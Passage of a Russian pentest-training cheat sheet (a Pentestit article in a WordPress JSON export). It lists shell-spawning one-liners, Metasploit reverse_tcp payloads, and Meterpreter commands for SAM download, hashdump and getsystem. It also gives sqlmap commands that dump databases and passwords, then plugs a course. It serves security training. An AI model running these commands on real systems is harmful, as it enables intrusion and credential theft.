Python TTY \u0448\u0435\u043b\u043b:<\/p>\n<p>  <\/p>\n<pre><code>python -c 'import pty;pty.spawn(&quot;\/bin\/bash&quot;)' echo os.system('\/bin\/bash')<\/code><\/pre>\n<p>  <\/p>\n<p>\u041f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u0435 \u0438\u043d\u0442\u0435\u0440\u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0433\u043e sh \u0448\u0435\u043b\u043b\u0430:<\/p>\n<p>  <\/p>\n<pre><code>\/bin\/sh -i<\/code><\/pre>\n<p>  <\/p>\n<p>\u041f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u0435 Perl TTY \u0448\u0435\u043b\u043b\u0430:<\/p>\n<p>  <\/p>\n<pre><code>exec &quot;\/bin\/sh&quot;; perl -e 'exec &quot;\/bin\/sh&quot;;'<\/code><\/pre>\n<p>  <\/p>\n<p>\u041f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u0435 Ruby TTY \u0448\u0435\u043b\u043b\u0430:<\/p>\n<p>  <\/p>\n<pre><code>exec &quot;\/bin\/sh&quot;<\/code><\/pre>\n<p>  <\/p>\n<p>\u041f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u0435 Lua TTY \u0448\u0435\u043b\u043b\u0430:<\/p>\n<p>  <\/p>\n<pre><code>os.execute('\/bin\/sh')<\/code><\/pre>\n<p>  <\/p>\n<p>\u041f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u0435 TTY \u0448\u0435\u043b\u043b\u0430 \u0438\u0437 Vi:<\/p>\n<p>  <\/p>\n<pre><code>:!bash<\/code><\/pre>\n<p>  <\/p>\n<p>\u041f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u0435 TTY \u0448\u0435\u043b\u043b\u0430 \u0447\u0435\u0440\u0435\u0437 NMAP (\u0441\u0442\u0430\u0440\u044b\u0435 \u0432\u0435\u0440\u0441\u0438\u0438)<\/p>\n<p>  <\/p>\n<pre><code>nmap --interactive !sh<\/code><\/pre>\n<p>  <\/p>\n<h3>Metasploit\/Meterpreter<\/h3>\n<p>  <\/p>\n<p>Windows reverse meterpreter payload \u0441 \u043e\u0431\u0440\u0430\u0442\u043d\u044b\u043c \u043f\u043e\u0434\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u0435\u043c:<\/p>\n<p>  <\/p>\n<pre><code>set payload windows\/meterpreter\/reverse_tcp<\/code><\/pre>\n<p>  <\/p>\n<p>Windows VNC Meterpreter payload<\/p>\n<p>  <\/p>\n<pre><code>set payload windows\/vncinject\/reverse_tcp set ViewOnly false<\/code><\/pre>\n<p>  <\/p>\n<p>Linux Reverse Meterpreter payload \u0441 \u043e\u0431\u0440\u0430\u0442\u043d\u044b\u043c \u043f\u043e\u0434\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u0435\u043c<\/p>\n<p>  <\/p>\n<pre><code>set payload linux\/meterpreter\/reverse_tcp<\/code><\/pre>\n<p>  <\/p>\n<h4>Meterpreter \u0421\u043f\u0440\u0430\u0432\u043e\u0447\u043d\u0438\u043a<\/h4>\n<p>  <\/p>\n<p>\u0417\u0430\u0433\u0440\u0443\u0437\u0438\u0442\u044c \u0444\u0430\u0439\u043b \u043d\u0430 windows \u043c\u0430\u0448\u0438\u043d\u0443 \u0447\u0435\u0440\u0435\u0437 Meterpreter:<\/p>\n<p>  <\/p>\n<pre><code>upload file c:\\\\windows<\/code><\/pre>\n<p>  <\/p>\n<p>\u0412\u044b\u0433\u0440\u0443\u0437\u0438\u0442\u044c \u0444\u0430\u0439\u043b \u0441 \u0446\u0435\u043b\u0435\u0432\u043e\u0439 Windows \u043c\u0430\u0448\u0438\u043d\u044b \u0447\u0435\u0440\u0435\u0437 Meterpreter:<\/p>\n<p>  <\/p>\n<pre><code>download c:\\\\windows\\\\repair\\\\sam \/tmp<\/code><\/pre>\n<p>  <\/p>\n<p>\u0412\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c exe \u0444\u0430\u0439\u043b \u0447\u0435\u0440\u0435\u0437 Meterpreter \u2014 \u0418\u0434\u0435\u0430\u043b\u044c\u043d\u043e \u0434\u043b\u044f \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u0437\u0430\u0433\u0440\u0443\u0436\u0435\u043d\u043d\u044b\u0445 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u043e\u0432:<\/p>\n<p>  <\/p>\n<pre><code>execute -f c:\\\\windows\\temp\\exploit.exe<\/code><\/pre>\n<p>  <\/p>\n<p>\u0421\u043e\u0437\u0434\u0430\u043d\u0438\u0435 \u043d\u043e\u0432\u043e\u0433\u043e \u043a\u0430\u043d\u0430\u043b\u0430 \u0441 cmd \u0448\u0435\u043b\u043b\u043e\u043c:<\/p>\n<p>  <\/p>\n<pre><code>execute -f cmd -c<\/code><\/pre>\n<p>  <\/p>\n<p>Meterpreter \u043f\u043e\u043a\u0430\u0436\u0435\u0442 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u044b:<\/p>\n<p>  <\/p>\n<pre><code>ps<\/code><\/pre>\n<p>  <\/p>\n<p>Meterpreter \u043f\u043e\u043b\u0443\u0447\u0438\u0442 \u0448\u0435\u043b\u043b \u0434\u043b\u044f \u0442\u0435\u043a\u0443\u0449\u0435\u0439 \u0441\u0435\u0441\u0441\u0438\u0438:<\/p>\n<p>  <\/p>\n<pre><code>shell<\/code><\/pre>\n<p>  <\/p>\n<p>Meterpreter \u043f\u043e\u043f\u044b\u0442\u0430\u0435\u0442\u0441\u044f \u043f\u043e\u0432\u044b\u0441\u0438\u0442\u044c \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0438 \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0435:<\/p>\n<p>  <\/p>\n<pre><code>getsystem<\/code><\/pre>\n<p>  <\/p>\n<p>Meterpreter \u043f\u043e\u043f\u044b\u0442\u0430\u0435\u0442\u0441\u044f \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0445\u044d\u0448\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u041e\u0421:<\/p>\n<p>  <\/p>\n<pre><code>hashdump<\/code><\/pre>\n<p>  <\/p>\n<p>Meterpreter \u0441\u043e\u0437\u0434\u0430\u0435\u0442 \u043f\u0435\u0440\u0435\u043d\u0430\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435 \u043f\u043e\u0440\u0442\u0430 \u0447\u0435\u0440\u0435\u0437 \u0446\u0435\u043b\u0435\u0432\u0443\u044e \u043c\u0430\u0448\u0438\u043d\u0443 (pivoting):<\/p>\n<p>  <\/p>\n<pre><code>portfwd add \u2013l 3389 \u2013p 3389 \u2013r target_host<\/code><\/pre>\n<p>  <\/p>\n<p>Meterpreter \u0443\u0434\u0430\u043b\u044f\u0435\u0442 \u043f\u0435\u0440\u0435\u043d\u0430\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435 \u043f\u043e\u0440\u0442\u0430 (pivoting):<\/p>\n<p>  <\/p>\n<pre><code>portfwd delete \u2013l 3389 \u2013p 3389 \u2013r target_host<\/code><\/pre>\n<p>  <\/p>\n<h3>SQLMap \u043f\u0440\u0438\u043c\u0435\u0440\u044b<\/h3>\n<p>  <\/p>\n<p>\u0410\u0432\u0442\u043e\u043c\u0430\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0439 \u0440\u0435\u0436\u0438\u043c:<\/p>\n<p>  <\/p>\n<pre><code>sqlmap -u http:\/\/site --forms --batch --crawl=10 --cookie=jsessionid=54321 --level=5 --risk=3<\/code><\/pre>\n<p>  <\/p>\n<p>\u0426\u0435\u043b\u0435\u0432\u043e\u0435 \u0441\u043a\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435:<\/p>\n<p>  <\/p>\n<pre><code>Sqlmap -u TARGET -p PARAM --data=POSTDATA --cookie=COOKIE  --level=3 --current-user --current-db --passwords --file-read=&quot;\/var\/www\/bla.php&quot; <\/code><\/pre>\n<p>  <\/p>\n<p>\u041f\u0440\u043e\u0441\u043a\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u0442\u044c url \u043d\u0430 union + error based \u0438\u043d\u044a\u0435\u043a\u0446\u0438\u0438 \u0434\u043b\u044f mysql \u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0441\u043b\u0443\u0447\u0430\u0439\u043d\u044b\u0439 user agent + \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c dump \u0431\u0430\u0437\u044b \u0434\u0430\u043d\u043d\u044b\u0445:<\/p>\n<p>  <\/p>\n<pre><code>sqlmap -u &quot;http:\/\/site\/bla.php?id=1&quot; --dbms=mysql --tech=U --random-agent --dump<\/code><\/pre>\n<p>  <\/p>\n<p>Sqlmap \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0430 \u0444\u043e\u0440\u043c\u044b \u043d\u0430 \u0438\u043d\u044a\u0435\u043a\u0446\u0438\u044e:<\/p>\n<p>  <\/p>\n<pre><code>sqlmap -o -u &quot;http:\/\/site\/form\/&quot; --forms<\/code><\/pre>\n<p>  <\/p>\n<p>Sqlmap \u0434\u0430\u043c\u043f \u0431\u0430\u0437\u044b \u0438 \u0432\u0437\u043b\u043e\u043c \u0445\u044d\u0448\u0435\u0439 \u0434\u043b\u044f \u0442\u0430\u0431\u043b\u0438\u0446\u044b users \u0431\u0430\u0437\u044b database-name:<\/p>\n<p>  <\/p>\n<pre><code>sqlmap -o -u &quot;http:\/\/site\/vuln-form&quot; --forms -D database-name -T users --dump<\/code><\/pre>\n<p>  <\/p>\n<h3>\u041e\u043f\u0440\u0435\u0434\u0435\u043b\u0435\u043d\u0438\u0435 \u0442\u0438\u043f\u0430 \u0445\u0435\u0448\u0435\u0439<\/h3>\n<p>  <\/p>\n<p>\u0423\u0434\u043e\u0431\u043d\u0435\u0435 \u0432\u0441\u0435\u0433\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0443\u0442\u0438\u043b\u0438\u0442\u0443 hash-identifier, \u043d\u043e \u0434\u043b\u044f \u043d\u0430\u0433\u043b\u044f\u0434\u043d\u043e\u0441\u0442\u0438 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044e \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0442\u0438\u043f\u043e\u0432 \u0445\u0435\u0448\u0435\u0439 \u0432\u0438\u0437\u0443\u0430\u043b\u044c\u043d\u043e:<br \/>  MD5 Hash:<\/p>\n<p>  <\/p>\n<pre><code>8743b52063cd84097a65d1633f5c74f5<\/code><\/pre>\n<p>  <\/p>\n<p>MD5 $PASS:$SALT:<\/p>\n<p>  <\/p>\n<pre><code>01dfae6e5d4d90d9892622325959afbe:7050461<\/code><\/pre>\n<p>  <\/p>\n<p>MD5 $SALT:$PASS:<\/p>\n<p>  <\/p>\n<pre><code>f0fda58630310a6dd91a7d8f0a4ceda2:4225637426<\/code><\/pre>\n<p>  <\/p>\n<p>SHA1 Hash:<\/p>\n<p>  <\/p>\n<pre><code>b89eaac7e61417341b710b727768294d0e6a277b<\/code><\/pre>\n<p>  <\/p>\n<p>SHA1 $PASS:$SALT:<\/p>\n<p>  <\/p>\n<pre><code>2fc5a684737ce1bf7b3b239df432416e0dd07357:2014<\/code><\/pre>\n<p>  <\/p>\n<p>SHA1 $SALT:$PASS:<\/p>\n<p>  <\/p>\n<pre><code>cac35ec206d868b7d7cb0b55f31d9425b075082b:5363620024<\/code><\/pre>\n<p>  <\/p>\n<p>SHA-256:<\/p>\n<p>  <\/p>\n<pre><code>127e6fbfe24a750e72930c220a8e138275656b8e5d8f48a98c3c92df2caba935<\/code><\/pre>\n<p>  <\/p>\n<p>SHA-256 $PASS:$SALT:<\/p>\n<p>  <\/p>\n<pre><code>c73d08de890479518ed60cf670d17faa26a4a71f995c1dcc978165399401a6c4<\/code><\/pre>\n<p>  <\/p>\n<p>SHA-256 $SALT:$PASS:<\/p>\n<p>  <\/p>\n<pre><code>eb368a2dfd38b405f014118c7d9747fcc97f4f0ee75c05963cd9da6ee65ef498:560407001617<\/code><\/pre>\n<p>  <\/p>\n<p>SHA-512:<\/p>\n<p>  <\/p>\n<pre><code>82a9dda829eb7f8ffe9fbe49e45d47d2dad9664fbb7adf72492e3c81ebd3e29134d9bc12212bf83c6840f10e8246b9db54a4859b7ccd0123d86e5872c1e5082f<\/code><\/pre>\n<p>  <\/p>\n<p>SHA-512 $PASS:$SALT:<\/p>\n<p>  <\/p>\n<pre><code>e5c3ede3e49fb86592fb03f471c35ba13e8d89b8ab65142c9a8fdafb635fa2223c24e5558fd9313e8995019dcbec1fb584146b7bb12685c7765fc8c0d51379fd<\/code><\/pre>\n<p>  <\/p>\n<p>SHA-512 $SALT:$PASS:<\/p>\n<p>  <\/p>\n<pre><code>976b451818634a1e2acba682da3fd6efa72adf8a7a08d7939550c244b237c72c7d42367544e826c0c83fe5c02f97c0373b6b1386cc794bf0d21d2df01bb9c08a<\/code><\/pre>\n<p>  <\/p>\n<p>NTLM:<\/p>\n<p>  <\/p>\n<pre><code>b4b9b02e6f09a9bd760f388b67351e2b<\/code><\/pre>\n<p>  <\/p>\n<h2>\u0417\u0430\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u0435<\/h2>\n<p>  <\/p>\n<p>\u0427\u0442\u043e\u0431\u044b \u0443\u0441\u043f\u0435\u0448\u043d\u043e \u043f\u0440\u043e\u0442\u0438\u0432\u043e\u0441\u0442\u043e\u044f\u0442\u044c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c, \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e \u0445\u043e\u0440\u043e\u0448\u043e \u0437\u043d\u0430\u0442\u044c \u043c\u0435\u0442\u043e\u0434\u0438\u043a\u0443 \u0438 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u044b \u0440\u0430\u0431\u043e\u0442\u044b, \u0447\u0442\u043e \u043a\u0440\u0430\u0439\u043d\u0435 \u0441\u043b\u043e\u0436\u043d\u043e, \u0443\u0447\u0438\u0442\u044b\u0432\u0430\u044f \u0438\u0445 \u0441\u0442\u0440\u0435\u043c\u0438\u0442\u0435\u043b\u044c\u043d\u043e\u0435 \u0440\u0430\u0437\u0432\u0438\u0442\u0438\u0435. \u041f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0430 \u043a\u0443\u0440\u0441\u0430 \u043e\u0431\u043d\u043e\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043a\u0430\u0436\u0434\u044b\u0439 \u043d\u0430\u0431\u043e\u0440, \u0447\u0442\u043e \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0434\u0430\u0432\u0430\u0442\u044c \u0430\u043a\u0442\u0443\u0430\u043b\u044c\u043d\u044b\u0435 \u0438 \u0432\u043e\u0441\u0442\u0440\u0435\u0431\u043e\u0432\u0430\u043d\u043d\u044b\u0435 \u0437\u043d\u0430\u043d\u0438\u044f \u0438 \u043f\u0440\u0430\u043a\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0435 \u043d\u0430\u0432\u044b\u043a\u0438 \u0432 \u043e\u0431\u043b\u0430\u0441\u0442\u0438 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u043e\u043d\u043d\u043e\u0439 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438.<\/p>\n<p>  <\/p>\n<p>\u0423\u043d\u0438\u043a\u0430\u043b\u044c\u043d\u043e\u0441\u0442\u044c \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u044b \u043a\u0443\u0440\u0441\u0430 \u0432 \u043f\u043e\u0434\u0430\u0447\u0435 \u0438 \u0437\u0430\u043a\u0440\u0435\u043f\u043b\u0435\u043d\u0438\u0438 \u043c\u0430\u0442\u0435\u0440\u0438\u0430\u043b\u0430 \u2014 20% \u0442\u0435\u043e\u0440\u0438\u0438 \u0438 80% \u043f\u0440\u0430\u043a\u0442\u0438\u043a\u0438. \u041f\u043e\u0441\u0442\u043e\u044f\u043d\u043d\u043e \u043e\u0431\u043d\u043e\u0432\u043b\u044f\u044f \u043c\u0435\u0442\u043e\u0434\u0438\u0447\u0435\u0441\u043a\u0438\u0439 \u043c\u0430\u0442\u0435\u0440\u0438\u0430\u043b \u0438 \u0434\u043e\u0431\u0430\u0432\u043b\u044f\u044f \u043f\u0440\u0430\u043a\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0435 \u0437\u0430\u0434\u0430\u043d\u0438\u044f \u043c\u044b \u0441\u0442\u0430\u0440\u0430\u0435\u043c\u0441\u044f \u0434\u0430\u0442\u044c \u043d\u0430\u0438\u0431\u043e\u043b\u0435\u0435 \u043f\u043e\u043b\u043d\u044b\u0439 \u043e\u0431\u044a\u0435\u043c \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 \u0434\u043b\u044f \u0442\u043e\u0433\u043e \u0447\u0442\u043e\u0431\u044b \u0443\u0447\u0430\u0441\u0442\u043d\u0438\u043a\u0438 \u043a\u0443\u0440\u0441\u0430 \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0438 \u0438\u0441\u0447\u0435\u0440\u043f\u044b\u0432\u0430\u044e\u0449\u0443\u044e \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u043e \u0441\u043e\u0432\u0440\u0435\u043c\u0435\u043d\u043d\u044b\u0445 \u0443\u0433\u0440\u043e\u0437\u0430\u0445 \u0438 \u043c\u0435\u0442\u043e\u0434\u0430\u0445 \u043f\u0440\u043e\u0442\u0438\u0432\u043e\u0434\u0435\u0439\u0441\u0442\u0432\u0438\u044f, \u043e\u0442\u043a\u0440\u044b\u043b\u0438 \u043d\u043e\u0432\u044b\u0435 \u0432\u0435\u043a\u0442\u043e\u0440\u0430 \u0440\u0430\u0437\u0432\u0438\u0442\u0438\u044f \u0432 \u043e\u0431\u043b\u0430\u0441\u0442\u0438 \u043f\u0440\u0430\u043a\u0442\u0438\u0447\u0435\u0441\u043a\u043e\u0439 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u043e\u043d\u043d\u043e\u0439 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438.<\/p>\n<p>  <\/p>\n<p><a href=\"https:\/\/www.pentestit.ru\/courses\/corp-lab\/\">\u041e\u0437\u043d\u0430\u043a\u043e\u043c\u0438\u0442\u044c\u0441\u044f \u0441 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043e\u0439 \u043a\u0443\u0440\u0441\u0430.<\/a><\/p>\n<p> \u0441\u0441\u044b\u043b\u043a\u0430 \u043d\u0430 \u043e\u0440\u0438\u0433\u0438\u043d\u0430\u043b \u0441\u0442\u0430\u0442\u044c\u0438 <a href=\"https:\/\/habrahabr.ru\/post\/325602\/\"> https:\/\/habrahabr.ru\/post\/325602\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<div style=\"text-align:center;\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/getpro\/habr\/post_images\/251\/60d\/569\/25160d5695974ff393c714703a791adb.png\" alt=\"image\" \/><\/div>\n<p>  <\/p>\n<p>\u041a\u043e\u0440\u043f\u043e\u0440\u0430\u0442\u0438\u0432\u043d\u044b\u0435 \u043b\u0430\u0431\u043e\u0440\u0430\u0442\u043e\u0440\u0438\u0438 Pentestit \u2014 \u0443\u043d\u0438\u043a\u0430\u043b\u044c\u043d\u044b\u0435 \u043f\u043e \u0441\u0432\u043e\u0435\u043c\u0443 \u0444\u043e\u0440\u043c\u0430\u0442\u0443 \u0438 \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u043d\u0438\u044e \u043a\u0443\u0440\u0441\u044b \u043f\u0440\u0430\u043a\u0442\u0438\u0447\u0435\u0441\u043a\u043e\u0439 \u0418\u0411-\u043f\u043e\u0434\u0433\u043e\u0442\u043e\u0432\u043a\u0438, \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0430\u043d\u043d\u044b\u0435 \u043d\u0430 \u043e\u0441\u043d\u043e\u0432\u0435 \u043b\u0443\u0447\u0448\u0438\u0445 \u043f\u0440\u0430\u043a\u0442\u0438\u043a \u0442\u0435\u0441\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u043d\u0430 \u043f\u0440\u043e\u043d\u0438\u043a\u043d\u043e\u0432\u0435\u043d\u0438\u0435 \u0438 \u0430\u043d\u0430\u043b\u0438\u0437\u0430 \u0437\u0430\u0449\u0438\u0449\u0435\u043d\u043d\u043e\u0441\u0442\u0438, \u043f\u043e \u0443\u0440\u043e\u0432\u043d\u044e \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u043d\u0438\u044f \u0441\u0440\u0430\u0432\u043d\u0438\u043c\u044b\u0435 \u0441 \u043c\u0430\u0442\u0435\u0440\u0438\u0430\u043b\u0430\u043c\u0438 \u0445\u0430\u043a\u0435\u0440\u0441\u043a\u0438\u0445 \u043a\u043e\u043d\u0444\u0435\u0440\u0435\u043d\u0446\u0438\u0439. \u0412\u043d\u0435 \u0437\u0430\u0432\u0438\u0441\u0438\u043c\u043e\u0441\u0442\u0438 \u043e\u0442 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c \u043e\u0431\u0443\u0447\u0435\u043d\u0438\u044f, \u0438\u0445 \u043a\u043b\u044e\u0447\u0435\u0432\u044b\u043c\u0438 \u043e\u0441\u043e\u0431\u0435\u043d\u043d\u043e\u0441\u0442\u044f\u043c\u0438 \u044f\u0432\u043b\u044f\u044e\u0442\u0441\u044f \u0430\u043a\u0442\u0443\u0430\u043b\u044c\u043d\u044b\u0439 \u043c\u0430\u0442\u0435\u0440\u0438\u0430\u043b \u0438 \u043f\u0440\u0430\u043a\u0442\u0438\u0447\u0435\u0441\u043a\u0430\u044f \u043f\u043e\u0434\u0433\u043e\u0442\u043e\u0432\u043a\u0430 \u0432 \u043f\u0435\u043d\u0442\u0435\u0441\u0442-\u043b\u0430\u0431\u043e\u0440\u0430\u0442\u043e\u0440\u0438\u044f\u0445, \u0441\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u044e\u0449\u0430\u044f 80% \u043e\u0442 \u043e\u0431\u0449\u0435\u0439 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u044b \u043a\u0443\u0440\u0441\u0430.<strong> \u0412 \u0434\u0430\u043d\u043d\u043e\u0439 \u0441\u0442\u0430\u0442\u044c\u0435 \u043c\u044b \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0438\u043c \u0440\u0430\u0437\u0431\u0438\u0440\u0430\u0442\u044c \u0431\u0430\u0437\u0438\u0441 \u043a\u043e\u043c\u0430\u043d\u0434 \u0438 \u043f\u043e\u043b\u0435\u0437\u043d\u044b\u0445 \u0442\u0440\u044e\u043a\u043e\u0432 \u043f\u0440\u0438 \u043f\u0440\u043e\u0432\u0435\u0434\u0435\u043d\u0438\u0438 \u0442\u0435\u0441\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u043d\u0430 \u043f\u0440\u043e\u043d\u0438\u043a\u043d\u043e\u0432\u0435\u043d\u0438\u0435.<\/strong><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[],"tags":[],"class_list":["post-284413","post","type-post","status-publish","format-standard","hentry"],"_links":{"self":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts\/284413","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=284413"}],"version-history":[{"count":0,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts\/284413\/revisions"}],"wp:attachment":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=284413"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=284413"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=284413"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}